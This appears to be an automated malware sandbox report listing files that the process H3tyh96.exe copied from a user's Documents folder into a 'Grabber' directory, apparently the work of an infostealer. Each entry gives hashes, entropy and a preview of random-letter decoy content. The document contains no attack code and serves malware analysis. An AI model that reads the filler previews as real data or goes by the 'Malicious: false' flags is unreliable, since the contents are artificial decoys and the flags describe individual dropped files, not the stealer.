Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\KLIZUSIQEN.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\ZGGKNSUKOP.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	false
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
